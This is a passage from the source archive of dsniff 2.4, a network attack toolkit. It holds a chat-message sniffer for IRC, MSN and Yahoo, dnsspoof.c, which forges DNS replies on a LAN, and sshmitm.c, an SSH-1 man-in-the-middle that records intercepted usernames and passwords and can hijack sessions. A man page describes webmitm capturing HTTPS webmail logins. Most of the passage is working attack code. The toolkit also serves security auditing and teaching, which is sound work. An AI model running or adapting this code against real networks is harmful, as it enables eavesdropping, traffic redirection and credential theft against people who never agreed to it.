buf_skip(line, 1); printf("%s IRC *** %.*s ", timestamp(), buf_len(prefix), buf_ptr(prefix)); prefix->offset = prefix->end + 1; prefix->end = prefix->size; printf("(%.*s) has joined channel %.*s\n", buf_len(prefix), buf_ptr(prefix), buf_len(line), buf_ptr(line)); } else if (buf_cmp(line, "PART ", 5) == 0 && prefix != NULL) { buf_skip(line, 5); if (buf_cmp(line, ":", 1) == 0) buf_skip(line, 1); if ((word = buf_getword(line, " :", 2)) == NULL) continue; printf("%s IRC *** %.*s has left channel %.*s\n", timestamp(), buf_len(prefix), buf_ptr(prefix), buf_len(word), buf_ptr(word)); buf_free(word); } else if (buf_cmp(line, "QUIT ", 5) == 0 && prefix != NULL) { buf_skip(line, 5); if (buf_cmp(line, ":", 1) == 0) buf_skip(line, 1); printf("%s IRC *** Signoff: %.*s (%.*s)\n", timestamp(), buf_len(prefix), buf_ptr(prefix), buf_len(line), buf_ptr(line)); } else if (buf_cmp(line, "NICK ", 5) == 0) { buf_skip(line, 5); if (buf_cmp(line, ":", 1) == 0) buf_skip(line, 1); if (prefix != NULL) { printf("%s IRC *** %.*s is now known as %.*s\n", timestamp(), buf_len(prefix), buf_ptr(prefix), buf_len(line), buf_ptr(line)); } else { if (info->nick) free(info->nick); info->nick = buf_strdup(line); } } else if (buf_cmp(line, "PRIVMSG ", 8) == 0) { buf_skip(line, 8); if ((word = buf_getword(line, " :", 2)) == NULL) continue; p = buf_strdup(line); if (regex_match(p)) { if (strncmp(p + 1, "ACTION ", 7) == 0) { printf("%s IRC * Action: ", timestamp()); if (prefix != NULL) { printf("%.*s %s\n", buf_len(prefix), buf_ptr(prefix), p + 8); } else printf("%s %s\n", info->nick, p + 8); } else { if (prefix != NULL) { printf("%s IRC %.*s > ", timestamp(), buf_len(prefix), buf_ptr(prefix)); } else printf("%s IRC %s > ", timestamp(), info->nick); printf("%.*s: %s\n", buf_len(word), buf_ptr(word), p); } } buf_free(word); free(p); } } return (len - buf_len(&buf)); } static int process_msn(struct client_info *info, u_char *data, int len) { struct buf *word, *line, buf; char *p; int i, reply; buf_init(&buf, data, len); while ((i = buf_index(&buf, "\r\n", 2)) >= 0) { line = buf_tok(&buf, NULL, i); buf_skip(&buf, 2); if (buf_cmp(line, "USR ", 4) == 0) { if ((i = buf_index(line, "MD5 ", 4)) > 0) { buf_skip(line, i + 4); if (buf_cmp(line, "I ", 2) == 0) { buf_skip(line, 2); if (info->nick != NULL) free(info->nick); info->nick = buf_strdup(line); } } } else if (buf_cmp(line, "IRO ", 4) == 0) { if ((i = buf_rindex(line, "1 ", 2)) < 0) continue; buf_skip(line, i + 2); word = buf_getword(line, " ", 1); if (info->peer != NULL) free(info->peer); info->peer = buf_strdup(word); buf_free(word); } else if (buf_cmp(line, "MSG ", 4) == 0) { buf_skip(line, 4); reply = 0; if ((word = buf_getword(line, " ", 1)) == NULL) continue; if (buf_cmp(line, "N ", 2) == 0 || buf_cmp(line, "U ", 2) == 0) { reply = 1; } else { if (info->peer != NULL) free(info->peer); info->peer = buf_strdup(word); } buf_free(word); if ((i = buf_rindex(line, " ", 1)) < 0) continue; buf_skip(line, i + 1); p = buf_strdup(line); i = atoi(p); free(p); if (i <= 0) continue; if ((line = buf_tok(NULL, NULL, i)) == NULL) break; if (buf_index(line, "Content-Type: text/plain", 24) > 0) { if ((i = buf_rindex(line, "\r\n\r\n", 4)) < 0) continue; buf_skip(line, i + 4); p = buf_strdup(line); if (regex_match(p)) { if (reply) { printf("%s MSN %s > %s: %s\n", timestamp(), info->nick, info->peer, p); } else printf("%s MSN %s > %s: %s\n", timestamp(), info->peer, info->nick, p); } free(p); } } } return (len - buf_len(&buf)); } struct yhoo { u_char version[8]; u_int32_t length; /* all fields little-endian */ u_int32_t service; u_int32_t connid; u_int32_t magic; u_int32_t unknown; u_int32_t type; u_char nick1[36]; u_char nick2[36]; }; struct ymsg { u_char version[8]; u_short length; u_short type; u_int32_t unknown1; u_int32_t unknown2; }; static int process_yahoo(struct client_info *info, u_char *data, int len) { struct yhoo *yhoo; struct ymsg *ymsg; struct buf *msg, *nick1, *nick2, buf; int i, reply; char *p; buf_init(&buf, data, len); if (buf_cmp(&buf, "YMSG", 4) == 0) { while (buf_len(&buf) > sizeof(*ymsg)) { ymsg = (struct ymsg *)buf_ptr(&buf); ymsg->length = ntohs(ymsg->length); ymsg->type = ntohs(ymsg->type); i = sizeof(*ymsg) + ymsg->length; if ((msg = buf_tok(&buf, NULL, i)) == NULL) break; buf_skip(msg, sizeof(*ymsg)); if (ymsg->type != 0x06) continue; reply = (buf_cmp(msg, "1", 1) != 0); buf_skip(msg, 3); nick1 = buf_getword(msg, "\xc0\x80", 2); buf_skip(msg, 3); nick2 = buf_getword(msg, "\xc0\x80", 2); buf_skip(msg, 4); msg->end -= 2; p = buf_strdup(msg); if (regex_match(p) && nick1 && nick2 && msg) { printf("%s Yahoo ", timestamp()); if (reply) printf("%.*s > %.*s: %s\n", buf_len(nick2), buf_ptr(nick2), buf_len(nick1), buf_ptr(nick1), p); else printf("%.*s > %.*s: %s\n", buf_len(nick1), buf_ptr(nick1), buf_len(nick2), buf_ptr(nick2), p); } if (nick1) buf_free(nick1); if (nick2) buf_free(nick2); free(p); } } else { while (buf_len(&buf) > sizeof(*yhoo)) { yhoo = (struct yhoo *)buf_ptr(&buf); yhoo->length = pletohl(&yhoo->length); yhoo->service = pletohl(&yhoo->service); yhoo->type = pletohl(&yhoo->type); yhoo->nick1[sizeof(yhoo->nick1) - 1] = '\0'; yhoo->nick2[sizeof(yhoo->nick2) - 1] = '\0'; i = sizeof(*yhoo) + yhoo->length; if ((msg = buf_tok(&buf, NULL, i)) == NULL) break; buf_skip(msg, sizeof(*yhoo)); if (yhoo->service != 6 || yhoo->type > 1) continue; if ((nick1 = buf_getword(msg, ",", 1)) == NULL) continue; if (memcmp(yhoo->version, "YHOO", 4) == 0) { buf_skip(msg, 1); reply = 0; } else reply = 1; p = buf_strdup(msg); if (regex_match(p)) { if (reply) printf("%s Yahoo %.*s > %s: %s\n", timestamp(), buf_len(nick1), buf_ptr(nick1), yhoo->nick2, p); else printf("%s Yahoo %s > %.*s: %s\n", timestamp(), yhoo->nick2, buf_len(nick1), buf_ptr(nick1), buf_ptr(msg)); } free(p); } } return (len - buf_len(&buf)); } static void sniff_msgs(struct tcp_stream *ts, void **conn_save) { struct client_info *c; int (*process_msgs)(struct client_info *, u_char *, int); int i; if (ts->addr.dest >= 6660 && ts->addr.dest <= 6680) { process_msgs = process_irc; } else if (ts->addr.dest == 5190 || ts->addr.dest == 9898) { process_msgs = process_aim; } else if (ts->addr.dest == 5050) { process_msgs = process_yahoo; } else if (ts->addr.dest == 1863) { process_msgs = process_msn; } else return; switch (ts->nids_state) { case NIDS_JUST_EST: ts->server.collect = 1; ts->client.collect = 1; i = 0; SLIST_FOREACH(c, &client_list, next) { if (c->ip == ts->addr.saddr) { i = 1; break; } } if (i == 0) { if ((c = malloc(sizeof(*c))) == NULL) nids_params.no_mem("sniff_msgs"); c->ip = ts->addr.saddr; c->nick = strdup("unknown"); SLIST_INSERT_HEAD(&client_list, c, next); } *conn_save = (void *)c; break; case NIDS_DATA: c = (struct client_info *)*conn_save; if (ts->server.count_new > 0) { i = process_msgs(c, ts->server.data, ts->server.count - ts->server.offset); nids_discard(ts, i); } else if (ts->client.count_new > 0) { i = process_msgs(c, ts->client.data, ts->client.count - ts->client.offset); nids_discard(ts, i); } fflush(stdout); break; default: c = (struct client_info *)*conn_save; if (ts->server.count > 0) process_msgs(c, ts->server.data, ts->server.count - ts->server.offset); else if (ts->client.count > 0) process_msgs(c, ts->client.data, ts->client.count - ts->client.offset); fflush(stdout); break; } } static void null_syslog(int type, int errnum, struct ip *iph, void *data) { } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; while ((c = getopt(argc, argv, "i:hv?V")) != -1) { switch (c) { case 'i': nids_params.device = optarg; break; case 'v': Opt_invert = 1; break; default: usage(); } } argc -= optind; argv += optind; if (argc > 0 && strlen(argv[0])) { if ((pregex = (regex_t *) malloc(sizeof(*pregex))) == NULL) err(1, "malloc"); if (regcomp(pregex, argv[0], REG_EXTENDED|REG_NOSUB) != 0) errx(1, "invalid regular expression"); } if (argc > 1) nids_params.pcap_filter = copy_argv(argv + 1); nids_params.scan_num_hosts = 0; nids_params.syslog = null_syslog; if (!nids_init()) errx(1, "%s", nids_errbuf); SLIST_INIT(&client_list); nids_register_tcp(sniff_msgs); if (nids_params.pcap_filter != NULL) { warnx("listening on %s [%s]", nids_params.device, nids_params.pcap_filter); } else warnx("listening on %s", nids_params.device); nids_run(); /* NOTREACHED */ exit(0); } dsniff-2.4/dnsspoof.c0000600000175000017500000001531107254077077014505 0ustar lucianoluciano/* * dnsspoof.c * * Forge replies to arbitrary DNS A / PTR queries on the LAN. * * Copyright (c) 2000 Dug Song * * $Id: dnsspoof.c,v 1.10 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcaputil.h" #include "version.h" struct dnsent { char *name; in_addr_t ip; SLIST_ENTRY(dnsent) next; }; SLIST_HEAD(, dnsent) dns_entries; pcap_t *pcap_pd = NULL; int pcap_off = -1; int lnet_sock = -1; u_long lnet_ip = -1; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: dnsspoof [-i interface] [-f hostsfile] [expression]\n"); exit(1); } /* Pattern matching code from OpenSSH. */ static int match_pattern(const char *s, const char *pattern) { for (;;) { if (!*pattern) return (!*s); if (*pattern == '*') { pattern++; if (!*pattern) return (1); if (*pattern != '?' && *pattern != '*') { for (; *s; s++) { if (*s == *pattern && match_pattern(s + 1, pattern + 1)) return (1); } return (0); } for (; *s; s++) { if (match_pattern(s, pattern)) return (1); } return (0); } if (!*s) return (0); if (*pattern != '?' && *pattern != *s) return (0); s++; pattern++; } /* NOTREACHED */ } static void dns_init(char *dev, char *filename) { FILE *f; struct libnet_link_int *llif; struct dnsent *de; char *ip, *name, buf[1024]; if ((llif = libnet_open_link_interface(dev, buf)) == NULL) errx(1, "%s", buf); if ((lnet_ip = libnet_get_ipaddr(llif, dev, buf)) == -1) errx(1, "%s", buf); lnet_ip = htonl(lnet_ip); libnet_close_link_interface(llif); SLIST_INIT(&dns_entries); if (filename != NULL) { if ((f = fopen(filename, "r")) == NULL) err(1, "fopen"); while (fgets(buf, sizeof(buf), f) != NULL) { if (buf[0] == '#' || buf[0] == '\n') continue; if ((ip = strtok(buf, "\t ")) == NULL || (name = strtok(NULL, "\n\t ")) == NULL) continue; if ((de = malloc(sizeof(*de))) == NULL) err(1, "malloc"); if ((de->ip = inet_addr(ip)) == INADDR_ANY || (de->name = strdup(name)) == NULL) errx(1, "invalid entry"); SLIST_INSERT_HEAD (&dns_entries, de, next); } fclose(f); } else { if ((de = malloc(sizeof(*de))) == NULL) err(1, "malloc"); de->ip = lnet_ip; de->name = "*"; SLIST_INSERT_HEAD (&dns_entries, de, next); } } static in_addr_t dns_lookup_a(const char *name) { struct dnsent *de; SLIST_FOREACH(de, &dns_entries, next) { if (match_pattern(name, de->name)) return (de->ip); } return (-1); } static char * dns_lookup_ptr(const char *name) { struct dnsent *de; int a0, a1, a2, a3; in_addr_t dst; char *a; if (strchr(name, '%') != NULL) return (NULL); if (sscanf(name, "%d.%d.%d.%d.", &a3, &a2, &a1, &a0) != 4) return (NULL); a = (char *)&dst; a[0] = a0 & 0xff; a[1] = a1 & 0xff; a[2] = a2 & 0xff; a[3] = a3 & 0xff; SLIST_FOREACH(de, &dns_entries, next) { if (de->ip == dst && strchr(de->name, '*') == NULL) return (de->name); } return (NULL); } static void dns_spoof(u_char *u, const struct pcap_pkthdr *pkthdr, const u_char *pkt) { struct libnet_ip_hdr *ip; struct libnet_udp_hdr *udp; HEADER *dns; char name[MAXHOSTNAMELEN]; u_char *p, *q, *end, buf[1024]; int i, anslen, dnslen; in_addr_t dst; u_short type, class; ip = (struct libnet_ip_hdr *)(pkt + pcap_off); udp = (struct libnet_udp_hdr *)(pkt + pcap_off + (ip->ip_hl * 4)); dns = (HEADER *)(udp + 1); p = (u_char *)(dns + 1); end = (u_char *)pkt + pkthdr->caplen; if ((dnslen = end - (u_char *)dns) < sizeof(*dns)) return; if (dns->opcode != QUERY || ntohs(dns->qdcount) != 1 || dns->ancount || dns->nscount || dns->arcount) return; if ((i = dn_expand((u_char *)dns, end, p, name, sizeof(name))) < 0) return; p += i; GETSHORT(type, p); GETSHORT(class, p); if (class != C_IN) return; p = buf + IP_H + UDP_H + dnslen; if (type == T_A) { if ((dst = dns_lookup_a(name)) == -1) return; /* XXX - cheat on alignment. */ memcpy(p, "\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04", 12); memcpy(p + 12, &dst, sizeof(dst)); anslen = 16; } else if (type == T_PTR) { if ((q = dns_lookup_ptr(name)) == NULL) return; /* XXX - cheat on alignment. */ memcpy(p, "\xc0\x0c\x00\x0c\x00\x01\x00\x00\x00\x3c", 10); anslen = dn_comp(q, p + 12, 256, NULL, NULL); p += 10; PUTSHORT(anslen, p); anslen += 12; } else return; libnet_build_ip(UDP_H + dnslen + anslen, 0, libnet_get_prand(PRu16), 0, 64, IPPROTO_UDP, ip->ip_dst.s_addr, ip->ip_src.s_addr, NULL, 0, buf); libnet_build_udp(ntohs(udp->uh_dport), ntohs(udp->uh_sport), NULL, dnslen + anslen, buf + IP_H); memcpy(buf + IP_H + UDP_H, (u_char *)dns, dnslen); dns = (HEADER *)(buf + IP_H + UDP_H); dns->qr = dns->ra = 1; if (type == T_PTR) dns->aa = 1; dns->ancount = htons(1); dnslen += anslen; libnet_do_checksum(buf, IPPROTO_UDP, UDP_H + dnslen); if (libnet_write_ip(lnet_sock, buf, IP_H + UDP_H + dnslen) < 0) warn("write"); fprintf(stderr, "%s.%d > %s.%d: %d+ %s? %s\n", libnet_host_lookup(ip->ip_src.s_addr, 0), ntohs(udp->uh_sport), libnet_host_lookup(ip->ip_dst.s_addr, 0), ntohs(udp->uh_dport), ntohs(dns->id), type == T_A ? "A" : "PTR", name); } static void cleanup(int sig) { libnet_close_raw_sock(lnet_sock); pcap_close(pcap_pd); exit(0); } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; char *p, *dev, *hosts, buf[1024]; int i; dev = hosts = NULL; while ((i = getopt(argc, argv, "i:f:h?")) != -1) { switch (i) { case 'i': dev = optarg; break; case 'f': hosts = optarg; break; default: usage(); break; } } argc -= optind; argv += optind; if (dev == NULL && (dev = pcap_lookupdev(buf)) == NULL) errx(1, "%s", buf); dns_init(dev, hosts); if (argc > 0) { p = copy_argv(argv); strlcpy(buf, p, sizeof(buf)); } else snprintf(buf, sizeof(buf), "udp dst port 53 and not src %s", libnet_host_lookup(lnet_ip, 0)); if ((pcap_pd = pcap_init(dev, buf, 128)) == NULL) errx(1, "couldn't initialize sniffing"); if ((pcap_off = pcap_dloff(pcap_pd)) < 0) errx(1, "couldn't determine link layer offset"); if ((lnet_sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1) errx(1, "couldn't initialize sending"); libnet_seed_prand(); signal(SIGHUP, cleanup); signal(SIGINT, cleanup); signal(SIGTERM, cleanup); warnx("listening on %s [%s]", dev, buf); pcap_loop(pcap_pd, -1, dns_spoof, NULL); /* NOTREACHED */ exit(0); } dsniff-2.4/magic.h0000600000175000017500000000052307254077102013723 0ustar lucianoluciano/* * magic.h * * Network application protocol identification, based on file(1) magic. * * Copyright (c) 2000 Dug Song * * $Id: magic.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef MAGIC_H #define MAGIC_H void magic_init(char *filename); char *magic_match(u_char *buf, int len); #endif /* MAGIC_H */ dsniff-2.4/pathnames.h0000600000175000017500000000057707254077102014634 0ustar lucianoluciano/* * pathnames.h * * dsniff pathnames. * * Copyright (c) 2000 Dug Song * * $Id: pathnames.h,v 1.2 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef PATHNAMES_H #define PATHNAMES_H #ifndef DSNIFF_LIBDIR #define DSNIFF_LIBDIR "/usr/local/lib/" #endif #define DSNIFF_SERVICES "dsniff.services" #define DSNIFF_MAGIC "dsniff.magic" #endif /* PATHNAMES_H */ dsniff-2.4/sshcrypto.c0000600000175000017500000001016107254077100014671 0ustar lucianoluciano/* * sshcrypto.c * * SSH-1 crypto routines, adapted from OpenSSH. * * Copyright (c) 2000 Dug Song * Copyright (c) 2000 Niels Provos * Copyright (c) 2000 Markus Friedl * * $Id: sshcrypto.c,v 1.5 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include "sshcrypto.h" struct blowfish_state { struct bf_key_st key; u_char iv[8]; }; struct des3_state { des_key_schedule k1, k2, k3; des_cblock iv1, iv2, iv3; }; void rsa_public_encrypt(BIGNUM *out, BIGNUM *in, RSA *key) { u_char *inbuf, *outbuf; int len, ilen, olen; if (BN_num_bits(key->e) < 2 || !BN_is_odd(key->e)) errx(1, "rsa_public_encrypt() exponent too small or not odd"); olen = BN_num_bytes(key->n); outbuf = malloc(olen); ilen = BN_num_bytes(in); inbuf = malloc(ilen); if (outbuf == NULL || inbuf == NULL) err(1, "malloc"); BN_bn2bin(in, inbuf); if ((len = RSA_public_encrypt(ilen, inbuf, outbuf, key, RSA_PKCS1_PADDING)) <= 0) errx(1, "rsa_public_encrypt() failed"); BN_bin2bn(outbuf, len, out); memset(outbuf, 0, olen); memset(inbuf, 0, ilen); free(outbuf); free(inbuf); } void rsa_private_decrypt(BIGNUM *out, BIGNUM *in, RSA *key) { u_char *inbuf, *outbuf; int len, ilen, olen; olen = BN_num_bytes(key->n); outbuf = malloc(olen); ilen = BN_num_bytes(in); inbuf = malloc(ilen); if (outbuf == NULL || inbuf == NULL) err(1, "malloc"); BN_bn2bin(in, inbuf); if ((len = RSA_private_decrypt(ilen, inbuf, outbuf, key, RSA_PKCS1_PADDING)) <= 0) errx(1, "rsa_private_decrypt() failed"); BN_bin2bn(outbuf, len, out); memset(outbuf, 0, olen); memset(inbuf, 0, ilen); free(outbuf); free(inbuf); } /* XXX - SSH1's weirdo Blowfish... */ static void swap_bytes(const u_char *src, u_char *dst, int n) { char c[4]; for (n = n / 4; n > 0; n--) { c[3] = *src++; c[2] = *src++; c[1] = *src++; c[0] = *src++; *dst++ = c[0]; *dst++ = c[1]; *dst++ = c[2]; *dst++ = c[3]; } } void * blowfish_init(u_char *sesskey, int len) { struct blowfish_state *state; if ((state = malloc(sizeof(*state))) == NULL) err(1, "malloc"); BF_set_key(&state->key, len, sesskey); memset(state->iv, 0, 8); return (state); } void blowfish_encrypt(u_char *src, u_char *dst, int len, void *state) { struct blowfish_state *estate; estate = (struct blowfish_state *)state; swap_bytes(src, dst, len); BF_cbc_encrypt((void *)dst, dst, len, &estate->key, estate->iv, BF_ENCRYPT); swap_bytes(dst, dst, len); } void blowfish_decrypt(u_char *src, u_char *dst, int len, void *state) { struct blowfish_state *dstate; dstate = (struct blowfish_state *)state; swap_bytes(src, dst, len); BF_cbc_encrypt((void *)dst, dst, len, &dstate->key, dstate->iv, BF_DECRYPT); swap_bytes(dst, dst, len); } /* XXX - SSH1's weirdo 3DES... */ void * des3_init(u_char *sesskey, int len) { struct des3_state *state; if ((state = malloc(sizeof(*state))) == NULL) err(1, "malloc"); des_set_key((void *)sesskey, state->k1); des_set_key((void *)(sesskey + 8), state->k2); if (len <= 16) des_set_key((void *)sesskey, state->k3); else des_set_key((void *)(sesskey + 16), state->k3); memset(state->iv1, 0, 8); memset(state->iv2, 0, 8); memset(state->iv3, 0, 8); return (state); } void des3_encrypt(u_char *src, u_char *dst, int len, void *state) { struct des3_state *estate; estate = (struct des3_state *)state; memcpy(estate->iv1, estate->iv2, 8); des_ncbc_encrypt(src, dst, len, estate->k1, &estate->iv1, DES_ENCRYPT); des_ncbc_encrypt(dst, dst, len, estate->k2, &estate->iv2, DES_DECRYPT); des_ncbc_encrypt(dst, dst, len, estate->k3, &estate->iv3, DES_ENCRYPT); } void des3_decrypt(u_char *src, u_char *dst, int len, void *state) { struct des3_state *dstate; dstate = (struct des3_state *)state; memcpy(dstate->iv1, dstate->iv2, 8); des_ncbc_encrypt(src, dst, len, dstate->k3, &dstate->iv3, DES_DECRYPT); des_ncbc_encrypt(dst, dst, len, dstate->k2, &dstate->iv2, DES_ENCRYPT); des_ncbc_encrypt(dst, dst, len, dstate->k1, &dstate->iv1, DES_DECRYPT); } dsniff-2.4/webmitm.80000600000175000017500000000132207254620522014225 0ustar lucianoluciano.TH WEBMITM 8 .ad .fi .SH NAME webmitm \- HTTP / HTTPS monkey-in-the-middle .SH SYNOPSIS .na .nf .fi \fBwebmitm\fR [\fB-d\fR] [\fBhost\fR] .SH DESCRIPTION .ad .fi \fBwebmitm\fR transparently proxies and sniffs HTTP / HTTPS traffic redirected by dnsspoof(8), capturing most "secure" SSL-encrypted webmail logins and form submissions. .SH OPTIONS .IP \fB-d\fR Enable debugging mode. May be specified multiple times to greater effect. .IP \fBhost\fR Specify a host to proxy to. If none given, only requests containing an HTTP/1.1 Host: header or absolute URI will be relayed transparently. .SH FILES .IP \fIwebmitm.crt\fR SSL certificate .SH "SEE ALSO" dsniff(8), dnsspoof(8) .SH AUTHOR .na .nf Dug Song dsniff-2.4/sshmitm.c0000600000175000017500000001767307254077100014336 0ustar lucianoluciano/* * sshmitm.c * * SSH monkey-in-the-middle. * * Copyright (c) 2000 Dug Song * * $Id: sshmitm.c,v 1.7 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include "buf.h" #include "record.h" #include "sshcrypto.h" #include "ssh.h" #include "version.h" int Opt_debug = 0; int Opt_interact = 0; u_short Opt_dns = 0; int Opt_read = 0; int Opt_write = 0; int mitm_fd; int client_fd, server_fd; SSH_CTX *ssh_client_ctx, *ssh_server_ctx; SSH *ssh_client, *ssh_server; struct sockaddr_in csin, ssin; int sig_pipe[2]; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: sshmitm [-d] [-I] [-p port] host [port]\n"); exit(1); } static void ssh_strlcat(char *dst, int size, char *src, int len) { char *p; u_int32_t i; for (p = dst; *p != '\0'; p++) ; size -= (p - dst - 1); GETLONG(i, src); i = MIN(i, len); i = MIN(i, size); memcpy(p, src, i); p[i] = '\0'; } static void sig_chld(int signal) { if (write(sig_pipe[1], "x", 1) == -1) warn("sig_chld"); } static void sig_int(int signal) { close(mitm_fd); record_close(); exit(0); } static void reap_child(void) { pid_t pid, status; while ((pid = waitpid(-1, &status, WNOHANG)) > 0) { if (Opt_debug) warnx("child %d terminated with status %d", pid, status); } } static void mitm_init(u_short lport, u_long ip, u_short rport) { int i = 1; if (pipe(sig_pipe) == -1) err(1, "pipe"); if ((mitm_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) err(1, "socket"); if (setsockopt(mitm_fd, SOL_SOCKET, SO_REUSEADDR, &i, sizeof(i)) == -1) err(1, "setsockopt"); memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = INADDR_ANY; ssin.sin_port = htons(lport); if (bind(mitm_fd, (struct sockaddr *)&ssin, sizeof(ssin)) == -1) err(1, "bind"); if (listen(mitm_fd, 3) == -1) err(1, "listen"); ssin.sin_addr.s_addr = ip; ssin.sin_port = htons(rport); SSH_init(); ssh_client_ctx = SSH_CTX_new(); ssh_client_ctx->hostkey = RSA_generate_key(1024, 35, NULL, NULL); ssh_client_ctx->servkey = RSA_generate_key(768, 35, NULL, NULL); if (ssh_client_ctx->hostkey == NULL || ssh_client_ctx->servkey == NULL) { errx(1, "RSA key generation failed"); } } static void mitm_child(void) { u_char buf[SSH_MAX_PKTLEN]; char userpass[1024]; fd_set fds; int i, pass_done, hijack_done; if (Opt_debug) warnx("new connection from %s.%d", inet_ntoa(csin.sin_addr), ntohs(csin.sin_port)); if (fcntl(client_fd, F_SETFL, 0) == -1) err(1, "fcntl"); /* Connect to real server. */ if ((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) err(1, "socket"); if (connect(server_fd, (struct sockaddr *)&ssin, sizeof(ssin)) == -1) err(1, "connect"); /* Relay version strings. */ if ((i = read(server_fd, buf, sizeof(buf))) <= 0 || buf[i - 1] != '\n') errx(1, "bad version string from server"); if (write(client_fd, buf, i) != i) err(1, "write"); if ((i = read(client_fd, buf, sizeof(buf))) <= 0 || buf[i - 1] != '\n') errx(1, "bad version string from client"); if (write(server_fd, buf, i) != i) err(1, "write"); /* Perform server key exchange. */ if ((ssh_server_ctx = SSH_CTX_new()) == NULL || (ssh_server = SSH_new(ssh_server_ctx)) == NULL) err(1, "malloc"); SSH_set_fd(ssh_server, server_fd); if (SSH_connect(ssh_server) == -1) errx(1, "server key exchange failed"); /* Perform client key exchange. */ if ((ssh_client = SSH_new(ssh_client_ctx)) == NULL) err(1, "malloc"); SSH_set_fd(ssh_client, client_fd); if (SSH_accept(ssh_client) == -1) errx(1, "client key exchange failed"); /* Relay username. */ if ((i = SSH_recv(ssh_client, buf, sizeof(buf))) <= 0 || buf[0] != SSH_CMSG_USER) errx(1, "couldn't get username"); userpass[0] = '\0'; ssh_strlcat(userpass, sizeof(userpass), buf + 1, i - 1); strlcat(userpass, "\n", sizeof(userpass)); if (SSH_send(ssh_server, buf, i) != i) errx(1, "couldn't relay username"); pass_done = hijack_done = 0; /* Relay packets. */ for (;;) { FD_ZERO(&fds); FD_SET(server_fd, &fds); i = server_fd; if (Opt_interact) { FD_SET(STDIN_FILENO, &fds); } if (!hijack_done) { FD_SET(client_fd, &fds); i = MAX(client_fd, i); } if (select(i + 1, &fds, 0, 0, 0) == -1) { if (errno != EINTR) break; } if (FD_ISSET(client_fd, &fds)) { i = sizeof(buf); if ((i = SSH_recv(ssh_client, buf, i)) <= 0) break; if (!pass_done) { if (buf[0] == SSH_CMSG_AUTH_PASSWORD) { ssh_strlcat(userpass, sizeof(userpass), buf + 1, i - 1); strlcat(userpass, "\n", sizeof(userpass)); } else { pass_done = 1; record(csin.sin_addr.s_addr, ssin.sin_addr.s_addr, IPPROTO_TCP, ntohs(csin.sin_port), ntohs(ssin.sin_port), "ssh", userpass, strlen(userpass)); } } if (SSH_send(ssh_server, buf, i) != i) break; } else if (FD_ISSET(server_fd, &fds)) { i = sizeof(buf); if ((i = SSH_recv(ssh_server, buf, i)) <= 0) break; if (Opt_interact) { if (buf[0] == SSH_SMSG_STDOUT_DATA && write(STDOUT_FILENO, buf + 5, i - 5) <= 0) { break; } else if (buf[0] == SSH_SMSG_STDERR_DATA && write(STDOUT_FILENO, buf + 5, i - 5) <= 0) { break; } else if (buf[0] == SSH_SMSG_EXITSTATUS || buf[0] == SSH_MSG_DISCONNECT) { warnx("connection closed"); break; } } if (!hijack_done) { if (SSH_send(ssh_client, buf, i) != i) break; } } else if (FD_ISSET(STDIN_FILENO, &fds)) { i = sizeof(buf) - 1; if ((i = read(STDIN_FILENO, buf + 5, i - 5)) <= 0) break; *(u_int32_t *)(buf + 1) = htonl(i); buf[0] = SSH_CMSG_STDIN_DATA; i += 5; if (SSH_send(ssh_server, buf, i) != i) break; /* Let the real client hang on connection hijack. */ if (!hijack_done) { fprintf(stderr, "[connection hijacked]\n"); hijack_done = 1; } } else err(1, "select"); } SSH_close(ssh_server); SSH_close(ssh_client); } static void mitm_run(void) { u_char buf[8192]; fd_set fds; int i; signal(SIGCHLD, sig_chld); signal(SIGINT, sig_int); if (fcntl(sig_pipe[0], F_SETFL, O_NONBLOCK) == -1 || fcntl(sig_pipe[1], F_SETFL, O_NONBLOCK) == -1) err(1, "fcntl"); if (fcntl(mitm_fd, F_SETFL, O_NONBLOCK) == -1) err(1, "fcntl"); for (;;) { FD_ZERO(&fds); FD_SET(mitm_fd, &fds); FD_SET(sig_pipe[0], &fds); i = MAX(mitm_fd, sig_pipe[0]); if (select(i + 1, &fds, 0, 0, 0) == -1) { if (errno != EINTR) err(1, "select"); } i = sizeof(csin); if (FD_ISSET(sig_pipe[0], &fds)) { while (read(sig_pipe[0], buf, 1) == 1) ; /* empty non-blocking pipe */ reap_child(); } if (FD_ISSET(mitm_fd, &fds)) { client_fd = accept(mitm_fd, (struct sockaddr *)&csin, &i); if (client_fd >= 0) { if (fork() == 0) { close(mitm_fd); mitm_child(); exit(0); } close(client_fd); } else if (errno != EINTR && errno != EWOULDBLOCK) { err(1, "accept"); } } } } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; u_long ip; u_short lport, rport; int c; lport = rport = 22; while ((c = getopt(argc, argv, "dIp:h?V")) != -1) { switch (c) { case 'd': Opt_debug = 1; break; case 'I': Opt_interact = 1; break; case 'p': if ((lport = atoi(optarg)) == 0) usage(); break; default: usage(); break; } } argc -= optind; argv += optind; if (argc < 1) usage(); if ((ip = libnet_name_resolve(argv[0], 1)) == -1) usage(); if (argc == 2 && (rport = atoi(argv[1])) == 0) usage(); record_init(NULL); mitm_init(lport, ip, rport); warnx("relaying to %s", argv[0]); mitm_run(); exit(0); } dsniff-2.4/decode_yp.c0000600000175000017500000000625007254077077014607 0ustar lucianoluciano/* * decode_yp.c * * RPC "Yellow Pee". * * Totally untested, i don't run YP. Let me know if this works. :-) * * Copyright (c) 2000 Dug Song * * $Id: decode_yp.c,v 1.6 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include "rpc.h" #include "decode.h" /* XXX - varies on different systems :-( */ struct my_passwd { char *pw_name; char *pw_passwd; int pw_uid; int pw_gid; char *pw_gecos; char *pw_dir; char *pw_shell; }; struct my_yppasswd { char *oldpass; struct my_passwd newpw; }; static bool_t 